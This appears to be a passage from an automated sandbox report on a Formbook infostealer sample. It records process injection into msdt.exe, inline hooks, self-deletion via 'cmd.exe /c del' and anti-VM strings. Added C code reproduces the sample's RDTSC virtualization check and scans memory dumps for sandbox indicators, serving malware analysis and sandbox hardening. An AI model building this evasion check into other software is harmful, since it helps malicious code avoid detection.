Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_00402D90, 2_2_00402D90
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_00409E2B, 2_2_00409E2B
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_00409E30, 2_2_00409E30
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_00402FB0, 2_2_00402FB0
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_00B59013, 2_2_00B59013
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05092D07, 6_2_05092D07
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05091D55, 6_2_05091D55
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_050925DD, 6_2_050925DD
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04FD841F, 6_2_04FD841F
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04FDD5E0, 6_2_04FDD5E0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0508D466, 6_2_0508D466
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04FF2581, 6_2_04FF2581
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04FC0D20, 6_2_04FC0D20
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04FE6E30, 6_2_04FE6E30
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05091FF1, 6_2_05091FF1
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0508D616, 6_2_0508D616
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05092EF7, 6_2_05092EF7
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04FF20A0, 6_2_04FF20A0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04FDB090, 6_2_04FDB090
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05081002, 6_2_05081002
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_050920A8, 6_2_050920A8
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04FE4120, 6_2_04FE4120
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_050928EC, 6_2_050928EC
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04FCF900, 6_2_04FCF900
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05092B28, 6_2_05092B28
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0508DBD2, 6_2_0508DBD2
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04FFEBB0, 6_2_04FFEBB0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_050922AE, 6_2_050922AE
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0301D28D, 6_2_0301D28D
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_03001030, 6_2_03001030
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_03002FB0, 6_2_03002FB0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_03009E2B, 6_2_03009E2B
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_03009E30, 6_2_03009E30
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_03002D90, 6_2_03002D90
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0301E407, 6_2_0301E407
Source: C:\Windows\SysWOW64\msdt.exe | Code function: String function: 04FCB150 appears 35 times
Source: SKM_C36821010708320.exe, 00000000.00000002.238052275.0000000006050000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamePositiveSign.dll< vs SKM_C36821010708320.exe
Source: SKM_C36821010708320.exe, 00000000.00000000.216347265.0000000000A92000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameServerObjectTerminatorSink.exe@ vs SKM_C36821010708320.exe
Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSoapName.dll2 vs SKM_C36821010708320.exe
Source: SKM_C36821010708320.exe, 00000002.00000000.230956986.0000000000C12000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameServerObjectTerminatorSink.exe@ vs SKM_C36821010708320.exe
Source: SKM_C36821010708320.exe, 00000002.00000002.272414307.000000000179F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SKM_C36821010708320.exe
Source: SKM_C36821010708320.exe, 00000002.00000002.272752865.00000000032E0000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamemsdt.exej% vs SKM_C36821010708320.exe
Source: SKM_C36821010708320.exe | Binary or memory string: OriginalFilenameServerObjectTerminatorSink.exe@ vs SKM_C36821010708320.exe
Source: SKM_C36821010708320.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@5/5
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SKM_C36821010708320.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4548:120:WilError_01
Source: SKM_C36821010708320.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Source: SKM_C36821010708320.exe | ReversingLabs: Detection: 28%
Source: unknown | Process created: C:\Users\user\Desktop\SKM_C36821010708320.exe 'C:\Users\user\Desktop\SKM_C36821010708320.exe'
Source: unknown | Process created: C:\Users\user\Desktop\SKM_C36821010708320.exe C:\Users\user\Desktop\SKM_C36821010708320.exe
Source: unknown | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKM_C36821010708320.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Process created: C:\Users\user\Desktop\SKM_C36821010708320.exe C:\Users\user\Desktop\SKM_C36821010708320.exe
Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKM_C36821010708320.exe'
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: SKM_C36821010708320.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SKM_C36821010708320.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: SKM_C36821010708320.exe, 00000002.00000002.272752865.00000000032E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: SKM_C36821010708320.exe, 00000002.00000002.272414307.000000000179F000.00000040.00000001.sdmp, msdt.exe, 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SKM_C36821010708320.exe, 00000002.00000002.272414307.000000000179F000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: msdt.pdb source: SKM_C36821010708320.exe, 00000002.00000002.272752865.00000000032E0000.00000040.00000001.sdmp

          Data Obfuscation:

.NET source code contains potential unpacker
Source: SKM_C36821010708320.exe, LoaderInformation.cs | .Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.SKM_C36821010708320.exe.9d0000.0.unpack, LoaderInformation.cs | .Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.SKM_C36821010708320.exe.b50000.1.unpack, LoaderInformation.cs | .Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.SKM_C36821010708320.exe.b50000.0.unpack, LoaderInformation.cs | .Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_0041D075 push eax; ret 2_2_0041D0C8
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_0041D0C2 push eax; ret 2_2_0041D0C8
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_0041D0CB push eax; ret 2_2_0041D132
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_00408171 pushfd ; retf 2_2_00408172
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_0041D12C push eax; ret 2_2_0041D132
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_00417206 push es; iretd 2_2_0041720C
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_00406C46 push edi; iretd 2_2_00406C4E
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_00417F59 push edi; retf 2_2_00417F5F
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_004167AE push 0000003Ah; retf 2_2_004167B2
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0501D0D1 push ecx; ret 6_2_0501D0E4
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_03017206 push es; iretd 6_2_0301720C
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0301D12C push eax; ret 6_2_0301D132
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_03008171 pushfd ; retf 6_2_03008172
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0301D075 push eax; ret 6_2_0301D0C8
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0301D0C2 push eax; ret 6_2_0301D0C8
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0301D0CB push eax; ret 6_2_0301D132
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_03017F59 push edi; retf 6_2_03017F5F
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_030167AE push 0000003Ah; retf 6_2_030167B2
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_03006C46 push edi; iretd 6_2_03006C4E
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_03000C7A push ebp; retf 6_2_03000C7E
Source: initial sample | Static PE information: section name: .text entropy: 7.22890252229

          Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xE2
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Process information set: NOOPENFILEERRORBOX (26 occurrences)
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX (4 occurrences)
Source: C:\Windows\SysWOW64\msdt.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SKM_C36821010708320.exe PID: 4740, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exe; RDTSC instruction interceptor: first address 00000000004098E4, second address 00000000004098EA; instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exe; RDTSC instruction interceptor: first address 0000000000409B4E, second address 0000000000409B54; instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe; RDTSC instruction interceptor: first address 00000000030098E4, second address 00000000030098EA; instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe; RDTSC instruction interceptor: first address 0000000003009B4E, second address 0000000003009B54; instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exe; Code function: 2_2_00409A80 rdtsc
          Note: the same two rdtsc pairs recur in msdt.exe at the same low address bits (...98E4 and ...9B4E) as in the sample, consistent with the sample's unpacked code being the payload injected into msdt.exe that the process injection signatures above describe.
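The four-instruction sequence listed above, reproduced as an added example to show how the timing check works and why a sandbox or hypervisor trips it. This is the editor's illustration, not code recovered from the sample or produced by the report's authors: the threshold constant, the function names and the probe count are assumptions, and the sample's real threshold is not visible in the report. The inline assembly follows the report's instruction order exactly (GCC/Clang syntax); on a non-x86 host a clock-based stand-in is compiled instead so the program still runs.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdint.h>
#include <stdio.h>
#if !defined(__x86_64__) && !defined(__i386__)
#include <time.h>
#endif

/* Two back-to-back timestamp reads in the exact order the report lists at
 * 0x4098E4: rdtsc; xor ecx,ecx; add ecx,eax; rdtsc. The low dword of the
 * first stamp is parked in ecx, the second rdtsc overwrites eax, and the
 * caller gets the difference of the two low dwords. */
uint32_t rdtsc_delta_low32(void)
{
#if defined(__x86_64__) || defined(__i386__)
    uint32_t first, second;
    __asm__ __volatile__(
        "rdtsc\n\t"
        "xor %%ecx, %%ecx\n\t"
        "add %%eax, %%ecx\n\t"      /* ecx = low dword of first stamp */
        "rdtsc\n\t"                 /* eax = low dword of second stamp */
        "mov %%ecx, %0\n\t"
        "mov %%eax, %1\n\t"
        : "=r"(first), "=r"(second)
        :
        : "eax", "ecx", "edx");
    return second - first;          /* modulo 2^32: a wrap mid-probe is harmless */
#else
    /* Portable stand-in on non-x86 hosts: nanoseconds between two clock reads. */
    struct timespec a, b;
    clock_gettime(CLOCK_MONOTONIC, &a);
    clock_gettime(CLOCK_MONOTONIC, &b);
    return (uint32_t)((uint64_t)(b.tv_sec - a.tv_sec) * 1000000000u
                      + (uint64_t)(b.tv_nsec - a.tv_nsec));
#endif
}

/* On bare metal two adjacent rdtsc instructions differ by a few dozen cycles.
 * Under a hypervisor that traps rdtsc, or a sandbox that single-steps it, the
 * delta jumps into the thousands. The threshold the sample itself compares
 * against is not in the report; 0x500 is an assumed stand-in. */
#define ASSUMED_RDTSC_THRESHOLD 0x500u

int delta_looks_instrumented(uint32_t delta, uint32_t threshold)
{
    return delta > threshold;
}

/* Take the minimum over several probes: a single interrupt or context switch
 * inflates one sample, and the minimum is what a careful check (and an analyst
 * reproducing it on a candidate sandbox image) should compare. */
uint32_t min_rdtsc_delta(int rounds)
{
    uint32_t best = UINT32_MAX;
    for (int i = 0; i < rounds; i++) {
        uint32_t d = rdtsc_delta_low32();
        if (d < best) best = d;
    }
    return best;
}

int main(void)
{
    uint32_t d = min_rdtsc_delta(64);
    printf("min rdtsc delta: %u -> %s\n", (unsigned)d,
           delta_looks_instrumented(d, ASSUMED_RDTSC_THRESHOLD)
               ? "looks instrumented" : "looks native");
    return 0;
}
```

The report's "RDTSC instruction interceptor" entries are the sandbox catching exactly this pair and reporting the addresses; a sandbox that wants to stay hidden has to answer both reads with a plausibly small gap, which is why analysts who replay such samples on their own VMs should first run a probe like this one and see which side of the threshold their image lands on.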
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exe; Thread delayed: delay time: 922337203685477 (this value is TimeSpan.MaxValue expressed in milliseconds, i.e. a .NET sleep that never returns on its own)
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exe TID: 3348; Thread sleep time: -53710s >= -30000s
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exe TID: 2336; Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5864; Thread sleep count: 49 > 30
          Source: C:\Windows\explorer.exe TID: 5864; Thread sleep time: -98000s >= -30000s
          Source: C:\Windows\explorer.exe; Last function: Thread delayed (listed twice)
          Source: C:\Windows\SysWOW64\msdt.exe; Last function: Thread delayed (listed twice)
          Source: explorer.exe, 00000003.00000000.255419635.000000000871F000.00000004.00000001.sdmp; Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.255419635.000000000871F000.00000004.00000001.sdmp; Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmp; Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000003.00000000.254740981.0000000008220000.00000002.00000001.sdmp; Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.255084026.0000000008640000.00000004.00000001.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmp; Binary or memory string: vmware
          Source: explorer.exe, 00000003.00000002.579768204.0000000004DF3000.00000004.00000001.sdmp; Binary or memory string: 1efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAL
          Source: explorer.exe, 00000003.00000002.581023913.00000000055D0000.00000004.00000001.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000003.00000000.255419635.000000000871F000.00000004.00000001.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.255419635.000000000871F000.00000004.00000001.sdmp; Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.255520845.00000000087D1000.00000004.00000001.sdmp; Binary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000000.248127457.0000000005603000.00000004.00000001.sdmp; Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.254740981.0000000008220000.00000002.00000001.sdmp; Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.254740981.0000000008220000.00000002.00000001.sdmp; Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmp; Binary or memory string: VMware SVGA II
          Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmp; Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000003.00000000.254740981.0000000008220000.00000002.00000001.sdmp; Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Note: the explorer.exe hits above (SCSI device instance IDs for the VMware virtual disk and SATA CD-ROM, Hyper-V error messages) are the analysis VM's own device enumeration and Windows resource strings sitting in explorer's memory; they describe the environment, not a check the sample performs. The SKM_C36821010708320.exe hits (the VMware Tools install path and registry key SOFTWARE\VMware, Inc.\VMware Tools, the VMware SVGA II adapter name, the bare vmware token) are in the same unpacked region (...02DC1000) that the AntiVM_3 rule matched on and are the sample's own lookup strings.
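The sandbox and VM indicator strings in this section (SBIEDLL.DLL and wine_get_unix_file_name under the sandbox-detection signature, the VMware strings immediately above) turned into a small dump triage scanner, as an added example that is not part of the report or the sample. It assumes nothing beyond the strings listed; the dump bytes it scans are constructed inline. The point it makes is practical: a .NET sample such as this one keeps its strings as UTF-16LE, so an ASCII-only grep of a memory dump misses a check string like SBIEDLL.DLL, and the mixed upper- and lower-case variants the report shows (VMWARE TOOLS, VMware Tools, vmware) need case-insensitive matching.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum {
    HIT_SANDBOXIE = 1u << 0, /* SBIEDLL.DLL: DLL Sandboxie injects into sandboxed processes */
    HIT_WINE      = 1u << 1, /* wine_get_unix_file_name: kernel32 export present only under Wine */
    HIT_VMWARE    = 1u << 2, /* VMware Tools path/key, SVGA II adapter name, bare "vmware" */
};

struct indicator {
    const char *needle;
    unsigned flag;
};

/* Needles are the strings the report lists in this section. */
static const struct indicator INDICATORS[] = {
    { "SBIEDLL.DLL",             HIT_SANDBOXIE },
    { "wine_get_unix_file_name", HIT_WINE },
    { "VMware Tools",            HIT_VMWARE },
    { "VMware SVGA II",          HIT_VMWARE },
    { "vmware",                  HIT_VMWARE },
};
#define N_INDICATORS (sizeof INDICATORS / sizeof INDICATORS[0])

/* Case-insensitive compare of needle against buf at off. stride 1 matches
 * ASCII; stride 2 matches UTF-16LE, which is how a .NET string sits in a
 * process dump (each ASCII character followed by a zero byte). */
static int match_at(const uint8_t *buf, size_t len, size_t off,
                    const char *needle, size_t stride)
{
    size_t n = strlen(needle);
    if (n * stride > len - off) return 0;
    for (size_t i = 0; i < n; i++) {
        const uint8_t *p = buf + off + i * stride;
        if (tolower(p[0]) != tolower((unsigned char)needle[i])) return 0;
        if (stride == 2 && p[1] != 0) return 0;
    }
    return 1;
}

/* Scan a memory region and return a bitmask of the indicator families found. */
unsigned scan_for_sandbox_artifacts(const uint8_t *buf, size_t len)
{
    unsigned hits = 0;
    for (size_t off = 0; off < len; off++) {
        for (size_t k = 0; k < N_INDICATORS; k++) {
            if (match_at(buf, len, off, INDICATORS[k].needle, 1) ||
                match_at(buf, len, off, INDICATORS[k].needle, 2))
                hits |= INDICATORS[k].flag;
        }
    }
    return hits;
}

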